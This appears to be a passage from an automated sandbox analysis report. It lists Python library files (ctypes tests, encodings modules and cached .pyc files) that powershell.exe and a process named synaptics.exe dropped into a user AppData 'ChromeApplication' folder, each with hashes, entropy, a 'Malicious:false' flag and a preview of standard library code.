                                                                                                                                                                                                  Preview:import unittest..from ctypes import *..from ctypes.test import need_symbol..import _ctypes_test....dll = CDLL(_ctypes_test.__file__)....try:.. CALLBACK_FUNCTYPE = WINFUNCTYPE..except NameError:.. # fake to enable this test on Linux.. CALLBACK_FUNCTYPE = CFUNCTYPE....class POINT(Structure):.. _fields_ = [("x", c_int), ("y", c_int)]....class BasicWrapTestCase(unittest.TestCase):.. def wrap(self, param):.. return param.... @need_symbol('c_wchar').. def test_wchar_parm(self):.. f = dll._testfunc_i_bhilfd.. f.argtypes = [c_byte, c_wchar, c_int, c_long, c_float, c_double].. result = f(self.wrap(1), self.wrap("x"), self.wrap(3), self.wrap(4), self.wrap(5.0), self.wrap(6.0)).. self.assertEqual(result, 139).. self.assertIs(type(result), int).... def test_pointers(self):.. f = dll._testfunc_p_p.. f.restype = POINTER(c_int).. f.argtypes = [POINTER(c_int)].... # This only works if the value c_int(42) pass

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_bitfields.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10652
                                                                                                                                                                                                  Entropy (8bit):4.486258559034558
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:zChoqnjC8LDnaBwEUOw4v9WzVSZWuSIJSMDKEd5kEdMwbEdqLdEdCidEdfudj4pr:Nq9ECvMtthkhwzU98vsA
                                                                                                                                                                                                  MD5:3D570B4C809341BCC9E10C45AEA8101A
                                                                                                                                                                                                  SHA1:23A102B4122FF39D6E99D3C451F2A92557CD1B48
                                                                                                                                                                                                  SHA-256:5FDB2670522B40F7EA52D1E1FEC71AC699DB65DE7044C374E2AB1D5E62DF51CC
                                                                                                                                                                                                  SHA-512:C0134C6D0CCE669CDF0E14B458F5B3D7384A2CA1E4FE695A2771416AE58B025D992E39B151A3F40C8ED238EB27E5457CEAE7920CFCE04312ACDE05E44318BE69
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:from ctypes import *..from ctypes.test import need_symbol..from test import support..import unittest..import os....import _ctypes_test....class BITS(Structure):.. _fields_ = [("A", c_int, 1),.. ("B", c_int, 2),.. ("C", c_int, 3),.. ("D", c_int, 4),.. ("E", c_int, 5),.. ("F", c_int, 6),.. ("G", c_int, 7),.. ("H", c_int, 8),.. ("I", c_int, 9),.... ("M", c_short, 1),.. ("N", c_short, 2),.. ("O", c_short, 3),.. ("P", c_short, 4),.. ("Q", c_short, 5),.. ("R", c_short, 6),.. ("S", c_short, 7)]....func = CDLL(_ctypes_test.__file__).unpack_bitfields..func.argtypes = POINTER(BITS), c_char....##for n in "ABCDEFGHIMNOPQRS":..## print n, hex(getattr(BITS, n).size), getattr(BITS, n).offset....class C_Test(unittest.TestCase):.... def test_ints(self):.. for i in r

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_buffers.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                  Entropy (8bit):4.726464719300847
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:zg6QNR3wJdAeKlBzO74JoJCIv4JonW8gQ/A:zg6aVwQ7lB5IQ0DA
                                                                                                                                                                                                  MD5:8E090D286F89A4227E0C674019C4420C
                                                                                                                                                                                                  SHA1:B47592B803064AD30926B18EF1202DFC9F581279
                                                                                                                                                                                                  SHA-256:1418BD67F4644C62B171EBC69E3C9C49A59955024303F7EA82C4A53BAFD90AA9
                                                                                                                                                                                                  SHA-512:8643D9E7D5AB27063628B14D3826CF2FC89AAA12472FF6E2D7BCD2455FA87B8F8DB0E7B54C55B62F07955BA52046D0E1460FD24E7DA7BB5519319347E6D6EC10
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:from ctypes import *..from ctypes.test import need_symbol..import unittest....class StringBufferTestCase(unittest.TestCase):.... def test_buffer(self):.. b = create_string_buffer(32).. self.assertEqual(len(b), 32).. self.assertEqual(sizeof(b), 32 * sizeof(c_char)).. self.assertIs(type(b[0]), bytes).... b = create_string_buffer(b"abc").. self.assertEqual(len(b), 4) # trailing nul char.. self.assertEqual(sizeof(b), 4 * sizeof(c_char)).. self.assertIs(type(b[0]), bytes).. self.assertEqual(b[0], b"a").. self.assertEqual(b[:], b"abc\0").. self.assertEqual(b[::], b"abc\0").. self.assertEqual(b[::-1], b"\0cba").. self.assertEqual(b[::2], b"ac").. self.assertEqual(b[::5], b"a").... self.assertRaises(TypeError, create_string_buffer, "abc").... def test_buffer_interface(self):.. self.assertEqual(len(bytearray(create_string_buffer(0))), 0).. self.assertEqual(len(bytearray(c

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_bytes.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2053
                                                                                                                                                                                                  Entropy (8bit):4.57704821148396
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:3F50kasMCPZhhRZzz57zhSvhbaYd5Xbj6OUb+bj6e2SJBJJ48aa1:3FPdJyqb+fJBj4na1
                                                                                                                                                                                                  MD5:2A38D98F71B4A58FC9B35908E4A99C00
                                                                                                                                                                                                  SHA1:A914FBA375BCB038F93E61A7E34FA688F751D90E
                                                                                                                                                                                                  SHA-256:27834A2AF2ABA22100F23859133B8F831CF1B2F18CFBC93AA9362A55441EB7B7
                                                                                                                                                                                                  SHA-512:EAC769E82BE7303245C75A190B75D56A8C14546F56B4D45880A5B5840D1F3DCD441C5FE1639EDE9C05B354DAE33D3780DBE890A299A0EC06735AFC511FB7A137
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:"""Test where byte objects are accepted"""..import unittest..import sys..from ctypes import *....class BytesTest(unittest.TestCase):.. def test_c_char(self):.. x = c_char(b"x").. self.assertRaises(TypeError, c_char, "x").. x.value = b"y".. with self.assertRaises(TypeError):.. x.value = "y".. c_char.from_param(b"x").. self.assertRaises(TypeError, c_char.from_param, "x").. self.assertIn('xbd', repr(c_char.from_param(b"\xbd"))).. (c_char * 3)(b"a", b"b", b"c").. self.assertRaises(TypeError, c_char * 3, "a", "b", "c").... def test_c_wchar(self):.. x = c_wchar("x").. self.assertRaises(TypeError, c_wchar, b"x").. x.value = "y".. with self.assertRaises(TypeError):.. x.value = b"y".. c_wchar.from_param("x").. self.assertRaises(TypeError, c_wchar.from_param, b"x").. (c_wchar * 3)("a", "b", "c").. self.assertRaises(TypeError, c_wchar * 3, b"a", b"b",

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_byteswap.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11726
                                                                                                                                                                                                  Entropy (8bit):4.645924708918119
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:kMw0r5LAAxiDxi1Ki3EHwn8Dqr/runjbCUBHIehzESdhfKjRWXG6S1yl+A:kM/rSAI4Ki3EHwn8Dqz0bCUBHIehzESJ
                                                                                                                                                                                                  MD5:0EE8372AACEF4A068D4E54D05D853077
                                                                                                                                                                                                  SHA1:83FC5B36A0695B5047B22A1BCDD3C621C4424B3D
                                                                                                                                                                                                  SHA-256:B08BAE08D658E415778544E079DE8C3B9C5BE1F0752B50D9A8E41EF0C72167B4
                                                                                                                                                                                                  SHA-512:DCA212F4878E82A7823E416C86F97B91BDAB577C48A0AC89F58FE2EF68483B731F56900E45953FBEEB94249254131686A8A1EA22549453F43BC2AEDB40B752C5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:import sys, unittest, struct, math, ctypes..from binascii import hexlify....from ctypes import *....def bin(s):.. return hexlify(memoryview(s)).decode().upper()....# Each *simple* type that supports different byte orders has an..# __ctype_be__ attribute that specifies the same type in BIG ENDIAN..# byte order, and a __ctype_le__ attribute that is the same type in..# LITTLE ENDIAN byte order...#..# For Structures and Unions, these types are created on demand.....class Test(unittest.TestCase):.. @unittest.skip('test disabled').. def test_X(self):.. print(sys.byteorder, file=sys.stderr).. for i in range(32):.. bits = BITS().. setattr(bits, "i%s" % i, 1).. dump(bits).... def test_slots(self):.. class BigPoint(BigEndianStructure):.. __slots__ = ().. _fields_ = [("x", c_int), ("y", c_int)].... class LowPoint(LittleEndianStructure):.. __slots__ = ().. _fields_ = [("x", c_int),

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_callbacks.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10898
                                                                                                                                                                                                  Entropy (8bit):4.729984414466043
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:goIGHfrrch4GT13ljAJsWhqJ7J8H4FnyUpl1S4iHeVbOmV23iKqDUMv0ryb8qjy:goIsTySes3iKWUS0ry4
                                                                                                                                                                                                  MD5:C8E1C51E8AB7F35EC5EF1C2B60086242
                                                                                                                                                                                                  SHA1:2F930DC43041F4161C050922022D510DD29D30F6
                                                                                                                                                                                                  SHA-256:33B1B43705113FF4D5D1E85F9A835FF3E44D39A7A27B3740D44406D414C164D7
                                                                                                                                                                                                  SHA-512:7CCA5C7376FEC9F7129B8C7F34D36C8D8446D306A01CD6C225E721FB9285878B538715AB506D7FCC71B88E5FCD5F84B0DD0AC5E824342E415590478C8D56FE68
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:import functools..import unittest..from test import support....from ctypes import *..from ctypes.test import need_symbol..import _ctypes_test....class Callbacks(unittest.TestCase):.. functype = CFUNCTYPE....## def tearDown(self):..## import gc..## gc.collect().... def callback(self, *args):.. self.got_args = args.. return args[-1].... def check_type(self, typ, arg):.. PROTO = self.functype.__func__(typ, typ).. result = PROTO(self.callback)(arg).. if typ == c_float:.. self.assertAlmostEqual(result, arg, places=5).. else:.. self.assertEqual(self.got_args, (arg,)).. self.assertEqual(result, arg).... PROTO = self.functype.__func__(typ, c_byte, typ).. result = PROTO(self.callback)(-3, arg).. if typ == c_float:.. self.assertAlmostEqual(result, arg, places=5).. else:.. self.assertEqual(self.got_args, (-3, arg)).. self.assertEqual(res

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_cast.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3827
                                                                                                                                                                                                  Entropy (8bit):4.6682890460925845
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:zBXtskbhc9HskGsk3BqgOFFfcMCMEHL15mdrh4IChrKyqA:zBXtskbhchskGskFhHL14dNeeNA
                                                                                                                                                                                                  MD5:4E21D156BEFD6A87F0194198AE282062
                                                                                                                                                                                                  SHA1:217846F5C7967101C82DFC9FF2BBF380933124F8
                                                                                                                                                                                                  SHA-256:9A6167790D619DA3031F46C47E1E90673417D615E0E51E2AEFF34025799FB50E
                                                                                                                                                                                                  SHA-512:6A954E25851CAACE7C56C920CCA532C864A71D0D07535F8473EFA628E36F66A87FEFC7B03B24EE852B63908C2D792F51E85DDF29170E3789E992F378D337CB03
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:from ctypes import *..from ctypes.test import need_symbol..import unittest..import sys....class Test(unittest.TestCase):.... def test_array2pointer(self):.. array = (c_int * 3)(42, 17, 2).... # casting an array to a pointer works... ptr = cast(array, POINTER(c_int)).. self.assertEqual([ptr[i] for i in range(3)], [42, 17, 2]).... if 2*sizeof(c_short) == sizeof(c_int):.. ptr = cast(array, POINTER(c_short)).. if sys.byteorder == "little":.. self.assertEqual([ptr[i] for i in range(6)],.. [42, 0, 17, 0, 2, 0]).. else:.. self.assertEqual([ptr[i] for i in range(6)],.. [0, 42, 0, 17, 0, 2]).... def test_address2pointer(self):.. array = (c_int * 3)(42, 17, 2).... address = addressof(array).. ptr = cast(c_void_p(address), POINTER(c_int)).. self.assertEqual([ptr[i] for i in range(3)], [42, 17, 2]

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_cfuncs.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7892
                                                                                                                                                                                                  Entropy (8bit):4.754544482863566
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:zeRwowNZmjZzLNjYyDYyNaxaPYyLYy/zaRbax2/7LAxWXitX1UotHy:ULv1D1v1L1/Ch7Ezez
                                                                                                                                                                                                  MD5:AD9026C0E907731CBBFDDB6CF9B54BF7
                                                                                                                                                                                                  SHA1:D816EED1B527D4F8B74DEBA92C364C337DCE1526
                                                                                                                                                                                                  SHA-256:9A500004FD764FC1E51C7939C70C2A934B9DD5D4AABCC60ACC741C831FEF0C74
                                                                                                                                                                                                  SHA-512:01264415C94704B93F50826FC74A0CEB6CC577F1BDBCFBDC8564079131F4121472ED3F48EDBB4235C9AC9AF25FDE67CE446BC5E7132C25EF05D3D53ED9119EB4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:# A lot of failures in these tests on Mac OS X...# Byte order related?....import unittest..from ctypes import *..from ctypes.test import need_symbol....import _ctypes_test....class CFunctions(unittest.TestCase):.. _dll = CDLL(_ctypes_test.__file__).... def S(self):.. return c_longlong.in_dll(self._dll, "last_tf_arg_s").value.. def U(self):.. return c_ulonglong.in_dll(self._dll, "last_tf_arg_u").value.... def test_byte(self):.. self._dll.tf_b.restype = c_byte.. self._dll.tf_b.argtypes = (c_byte,).. self.assertEqual(self._dll.tf_b(-126), -42).. self.assertEqual(self.S(), -126).... def test_byte_plus(self):.. self._dll.tf_bb.restype = c_byte.. self._dll.tf_bb.argtypes = (c_byte, c_byte).. self.assertEqual(self._dll.tf_bb(0, -126), -42).. self.assertEqual(self.S(), -126).... def test_ubyte(self):.. self._dll.tf_B.restype = c_ubyte.. self._dll.tf_B.argtypes = (c_ubyte,).. self.assert

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_checkretval.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1004
                                                                                                                                                                                                  Entropy (8bit):4.58109088421519
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:ixHCSUGuoduNM3tpF2teU72teZ24bpegF2OH3pe:ixvUGumyMd7YD7Y4pp9r3A
                                                                                                                                                                                                  MD5:5B069F0F2470A6FB5FA0DBB841199996
                                                                                                                                                                                                  SHA1:8F0D37E7E5E9C28D0337A932C2D45253E2A0760D
                                                                                                                                                                                                  SHA-256:D17F4F281CD0B91A041EE760931DDBCC20040CA0136532BFEC19D23A1A74026D
                                                                                                                                                                                                  SHA-512:BFCFA7A615C8DFB844E20212A2E8C52D295C0E9BF1DDA9DD9D8EB05F4CDC501CB9603FE04D7C123C4196CFB2A5CCAE3AF1397C6B81B64C12908FF621DB99EF54
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:import unittest....from ctypes import *..from ctypes.test import need_symbol....class CHECKED(c_int):.. def _check_retval_(value):.. # Receives a CHECKED instance... return str(value.value).. _check_retval_ = staticmethod(_check_retval_)....class Test(unittest.TestCase):.... def test_checkretval(self):.... import _ctypes_test.. dll = CDLL(_ctypes_test.__file__).. self.assertEqual(42, dll._testfunc_p_p(42)).... dll._testfunc_p_p.restype = CHECKED.. self.assertEqual("42", dll._testfunc_p_p(42)).... dll._testfunc_p_p.restype = None.. self.assertEqual(None, dll._testfunc_p_p(42)).... del dll._testfunc_p_p.restype.. self.assertEqual(42, dll._testfunc_p_p(42)).... @need_symbol('oledll').. def test_oledll(self):.. self.assertRaises(OSError,.. oledll.oleaut32.CreateTypeLib2,.. 0, None, None)....if __name__ == "__main__":.. unittest.main

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_delattr.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):554
                                                                                                                                                                                                  Entropy (8bit):4.311608480116657
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:FA1WTipmAlwtsXrzypJNXffqTtlmirzmcXffqTALrzNXffqTXJ9pAjpH2My:FA1/sA0UtlmyUyUXJ9p2pWB
                                                                                                                                                                                                  MD5:5DF9815304C86ACE6020573F2C3285F5
                                                                                                                                                                                                  SHA1:B0BD39AC1F37248B44CE8816331035A714A7BCF7
                                                                                                                                                                                                  SHA-256:06EBC4D5D019BF56D6EB72B2791CF908900DD7E90156B23DD89B21425A25E422
                                                                                                                                                                                                  SHA-512:1C0173605DC480EE211A0B1CEDEAE38A68EFDF6037BFE762BABBCF3F6EB6CF784AE9AECAF5D276B400F938675CC6B5A965AAB12FB4C56E55F5DF5708E4D17EAA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:import unittest..from ctypes import *....class X(Structure):.. _fields_ = [("foo", c_int)]....class TestCase(unittest.TestCase):.. def test_simple(self):.. self.assertRaises(TypeError,.. delattr, c_int(42), "value").... def test_chararray(self):.. self.assertRaises(TypeError,.. delattr, (c_char * 5)(), "value").... def test_struct(self):.. self.assertRaises(TypeError,.. delattr, X(), "foo")....if __name__ == "__main__":.. unittest.main()..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_errno.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2247
                                                                                                                                                                                                  Entropy (8bit):4.545545871619444
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xUx0rv0+eNZeu+6NG5uPJdeSYGdAUpC/A:xUx0r8i5uPtYsuA
                                                                                                                                                                                                  MD5:D4DA9B407207F65B8B1F9225D7461117
                                                                                                                                                                                                  SHA1:498AD376A84DA85882CCB8A08AAC8C8D1E2BF981
                                                                                                                                                                                                  SHA-256:B6816BFCF26A4816C334A2388F02BB66BEC7DB3FEF9ACD34B0A1FCB50B1CF246
                                                                                                                                                                                                  SHA-512:FD28AE9C77E11A30E27786F5C0D4A1C679E3C2F879B4C66545236362695F3EE9F0A5139F2F14E5D703DEC06C4D8D88901FA44A79FBFE4E1F99910EF48CB4780A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:import unittest, os, errno..import threading....from ctypes import *..from ctypes.util import find_library....class Test(unittest.TestCase):.. def test_open(self):.. libc_name = find_library("c").. if libc_name is None:.. raise unittest.SkipTest("Unable to find C library").. libc = CDLL(libc_name, use_errno=True).. if os.name == "nt":.. libc_open = libc._open.. else:.. libc_open = libc.open.... libc_open.argtypes = c_char_p, c_int.... self.assertEqual(libc_open(b"", 0), -1).. self.assertEqual(get_errno(), errno.ENOENT).... self.assertEqual(set_errno(32), errno.ENOENT).. self.assertEqual(get_errno(), 32).... def _worker():.. set_errno(0).... libc = CDLL(libc_name, use_errno=False).. if os.name == "nt":.. libc_open = libc._open.. else:.. libc_open = libc.open.. libc_open.argtypes = c_char_p, c

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5790
                                                                                                                                                                                                  Entropy (8bit):4.479931891852748
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:VHdpCpI/qD2Q0pU8F6fdaLcbkCN/yRMffWL1+rpOc6i7AYS2kEJlQ6w1AD4:XpCpIPpHEN/yYi1+NOc6IAYS2kEXQ6wr
                                                                                                                                                                                                  MD5:7E6A62EF920CCBBC78ACC236FDF027B5
                                                                                                                                                                                                  SHA1:816AFC9EA3C9943E6A7E2FAE6351530C2956F349
                                                                                                                                                                                                  SHA-256:93CFD89699B7F800D6CCFB93266DA4DB6298BD73887956148D1345D5CA6742A9
                                                                                                                                                                                                  SHA-512:C883B506AACD94863A0DD8C890CBF7D6B1E493D1A9AF9CDF912C047B1CA98691CFD910887961DD94825841B0FE9DADD3AB4E7866E26E10BFBBAE1A2714A8F983
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Standard "encodings" Package.... Standard Python encoding modules are stored in this package.. directory..... Codec modules must have names corresponding to normalized encoding.. names as defined in the normalize_encoding() function below, e.g... 'utf-8' must be implemented by the module 'utf_8.py'..... Each codec module must export the following interface:.... * getregentry() -> codecs.CodecInfo object.. The getregentry() API must return a CodecInfo object with encoder, decoder,.. incrementalencoder, incrementaldecoder, streamwriter and streamreader.. attributes which adhere to the Python Codec Interface Standard..... In addition, a module may optionally also define the following.. APIs which are then used by the package's codec search function:.... * getaliases() -> sequence of encoding name strings to use as aliases.... Alias names returned by getaliases() must be normalized encoding.. names as defined by normalize_encoding().....Writ

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\__init__.cpython-310.pyc.9632672

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3907
                                                                                                                                                                                                  Entropy (8bit):5.526155332237404
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:rXLHIYGspF3e06Q0YhQCUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:rXEYLpFkY/U7XYLf5c6+X1Y
                                                                                                                                                                                                  MD5:396CAECFC2CA791A2B5EB0DA3D93CE86
                                                                                                                                                                                                  SHA1:FB2339503110598F6F4C9BB51AD9076BB9F04E85
                                                                                                                                                                                                  SHA-256:15272491F9EC5941F1570B1FEEBABDCCCFA1055DAA178F07F143AFDC1BA6CC11
                                                                                                                                                                                                  SHA-512:C2E3F84EFD00534A5481D5EF0E2ABF7C564FB8950486F3319B13B730112A56D725F4C412F9DDE7DF374CBA3932BF6650903D3D8F161F3C2E169D57507F850EEC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\aliases.cpython-310.pyc.9632928

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10953
                                                                                                                                                                                                  Entropy (8bit):5.844343768194318
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9X2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1imzxOkq4bpehh3qkyR0N:9XG0bueBI6wzx9IX6Ri
                                                                                                                                                                                                  MD5:746535CB26B77B4B533235C67E102D49
                                                                                                                                                                                                  SHA1:8E3BA44F4F5310B82589ABF1A850D7EF7A7070C1
                                                                                                                                                                                                  SHA-256:273E66EC43020C1F43C7CA5A17E859C0F0538945F3CD7694F8A5808BB1EE72A5
                                                                                                                                                                                                  SHA-512:B2E6E6406D76756FE232F4D99913691369D02282022FA09E09C2A8A847AAEA0373A99E2D2F10FD6BAFB72EA98DF132D877325E9CFC8FE17DA8C41C564D4CFBEC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o.......:.-dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\cp1252.cpython-310.pyc.9632800

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2409
                                                                                                                                                                                                  Entropy (8bit):5.437461590795037
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:GHYqr1EY+GxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:GHY0EFWtZjr+Jldf33Pf396nz
                                                                                                                                                                                                  MD5:60EC623C7E0567E84675B5136062BC77
